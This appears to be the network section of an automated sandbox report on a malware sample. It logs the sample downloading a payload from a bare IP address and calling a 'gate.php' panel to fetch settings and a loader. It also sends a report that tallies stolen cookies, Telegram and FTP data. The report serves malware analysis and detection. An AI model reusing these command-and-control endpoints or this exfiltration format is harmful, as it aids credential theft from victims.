Network Analysis
IP Address | Status | Action |
---|---|---|
134.209.203.126 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
GET
200
http://134.209.203.126/hornycock/system/assets/bundle.bin
REQUEST
RESPONSE
BODY
GET /hornycock/system/assets/bundle.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Host: 134.209.203.126
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:41 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 13 Jun 2021 13:48:00 GMT
ETag: "4f1c00-5c4a5fd304400"
Accept-Ranges: bytes
Content-Length: 5184512
Content-Type: application/octet-stream
GET
200
http://134.209.203.126/hornycock/gate.php?type=settings
REQUEST
RESPONSE
BODY
GET /hornycock/gate.php?type=settings HTTP/1.1
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:47 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 644
Content-Type: text/html; charset=UTF-8
GET
200
http://134.209.203.126/hornycock/gate.php?type=ip
REQUEST
RESPONSE
BODY
GET /hornycock/gate.php?type=ip HTTP/1.1
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:48 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 15
Content-Type: text/html; charset=UTF-8
GET
200
http://134.209.203.126/hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
REQUEST
RESPONSE
BODY
GET /hornycock/gate.php?type=report&tag=traffer1&uid=39B06D4D868D1303186797&passwords=0&cookies=2&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126
Content-Length: 1420263
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET
200
http://134.209.203.126/hornycock/gate.php?type=loader&tag=traffer1
REQUEST
RESPONSE
BODY
GET /hornycock/gate.php?type=loader&tag=traffer1 HTTP/1.1
User-Agent: GBgMy82xUJQg3tQyrdJQ
Host: 134.209.203.126
HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 04:53:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts